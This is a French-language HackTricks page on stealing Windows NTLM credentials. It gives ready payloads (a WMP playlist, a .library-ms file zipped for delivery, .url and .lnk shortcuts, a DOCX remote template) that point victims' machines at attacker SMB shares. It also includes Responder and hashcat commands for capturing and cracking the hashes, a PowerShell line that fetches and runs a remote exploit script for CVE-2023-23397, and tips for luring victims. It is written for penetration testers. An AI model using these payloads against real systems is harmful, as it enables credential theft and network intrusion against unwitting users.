Endroits pour voler NTLM creds

Reading time: 7 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Consultez toutes les excellentes idĂ©es de https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — du tĂ©lĂ©chargement d'un fichier Microsoft Word en ligne Ă  la ntlm leaks source : https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md et https://github.com/p0dalirius/windows-coerced-authentication-methods

Windows Media Player playlists (.ASX/.WAX)

Si vous parvenez Ă  faire ouvrir ou prĂ©visualiser Ă  une cible une Windows Media Player playlist que vous contrĂŽlez, vous pouvez leak Net‑NTLMv2 en pointant l'entrĂ©e vers un chemin UNC. WMP tentera de rĂ©cupĂ©rer le mĂ©dia rĂ©fĂ©rencĂ© via SMB et s'authentifiera implicitement.

Exemple de payload:

xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>

Flux de collecte et de cracking:

bash
# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)

Windows Explorer gĂšre de maniĂšre non sĂ©curisĂ©e les fichiers .library-ms lorsqu'ils sont ouverts directement Ă  partir d'une archive ZIP. Si la dĂ©finition de la bibliothĂšque pointe vers un chemin UNC distant (par ex., \attacker\share), le simple fait de parcourir/lancer le .library-ms Ă  l'intĂ©rieur du ZIP amĂšne Explorer Ă  Ă©numĂ©rer le UNC et Ă  Ă©mettre une authentification NTLM vers l'attaquant. Cela gĂ©nĂšre un NetNTLMv2 qui peut ĂȘtre cracked hors ligne ou potentiellement relayed.

Exemple minimal de .library-ms pointant vers un UNC contrÎlé par l'attaquant

xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Étapes opĂ©rationnelles

  • CrĂ©ez le fichier .library-ms avec le XML ci‑dessus (dĂ©finissez votre IP/nom d'hĂŽte).
  • Zippez-le (sur Windows : Send to → Compressed (zipped) folder) et livrez le ZIP Ă  la cible.
  • Lancez un NTLM capture listener et attendez que la victime ouvre le .library-ms depuis l’intĂ©rieur du ZIP.

Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak

Microsoft Outlook for Windows traitait la propriĂ©tĂ© MAPI Ă©tendue PidLidReminderFileParameter dans les Ă©lĂ©ments de calendrier. Si cette propriĂ©tĂ© pointe vers un chemin UNC (p. ex., \attacker\share\alert.wav), Outlook contacterait le partage SMB lorsque le rappel se dĂ©clenche, provoquant le leak du Net‑NTLMv2 de l’utilisateur sans aucun clic. Cela a Ă©tĂ© corrigĂ© le 14 mars 2023, mais c’est toujours trĂšs pertinent pour les flottes legacy/non mises Ă  jour et pour l’analyse d’incidents historiques.

Exploitation rapide avec PowerShell (Outlook COM):

powershell
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav

CÎté Listener:

bash
sudo responder -I eth0  # or impacket-smbserver to observe connections

Remarques

  • Une victime a seulement besoin d’avoir Outlook for Windows en cours d’exĂ©cution lorsque le rappel se dĂ©clenche.
  • Le leak fournit Net‑NTLMv2, adaptĂ© Ă  l’offline cracking ou au relay (pas pass‑the‑hash).

.LNK/.URL basĂ© sur l'icĂŽne zero‑click NTLM leak (CVE‑2025‑50154 – contournement de CVE‑2025‑24054)

Windows Explorer affiche automatiquement les icĂŽnes des raccourcis. Des recherches rĂ©centes ont montrĂ© que, mĂȘme aprĂšs le patch d’avril 2025 de Microsoft pour les raccourcis d’icĂŽnes UNC, il Ă©tait toujours possible de dĂ©clencher une authentification NTLM sans clics en hĂ©bergeant la cible du raccourci sur un chemin UNC et en laissant l’icĂŽne locale (contournement du patch attribuĂ© CVE‑2025‑50154). La simple visualisation du dossier amĂšne Explorer Ă  rĂ©cupĂ©rer les mĂ©tadonnĂ©es de la cible distante, envoyant NTLM vers le serveur SMB de l’attaquant.

Payload minimal Internet Shortcut (.url) :

ini
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

Payload de raccourci de programme (.lnk) via PowerShell:

powershell
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

Idées de livraison

  • Placez le raccourci dans une archive ZIP et incitez la victime Ă  la parcourir.
  • Placez le raccourci sur un partage accessible en Ă©criture que la victime ouvrira.
  • Combinez avec d'autres fichiers d'appĂąt dans le mĂȘme dossier pour que Explorer prĂ©visualise les Ă©lĂ©ments.

Office remote template injection (.docx/.dotm) pour forcer NTLM

Les documents Office peuvent référencer un template externe. Si vous définissez le template joint sur un chemin UNC, l'ouverture du document s'authentifiera auprÚs de SMB.

Modifications minimales des relations DOCX (à l'intérieur de word/):

  1. Éditez word/settings.xml et ajoutez la rĂ©fĂ©rence au template joint :
xml
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
  1. Éditez word/_rels/settings.xml.rels et pointez rId1337 vers votre UNC :
xml
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
  1. Repaqueter en .docx et livrer. Lancez votre listener de capture SMB et attendez l'ouverture.

Pour des idées post-capture sur le relaying ou l'abus de NTLM, consultez :

HackTricks

Références

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks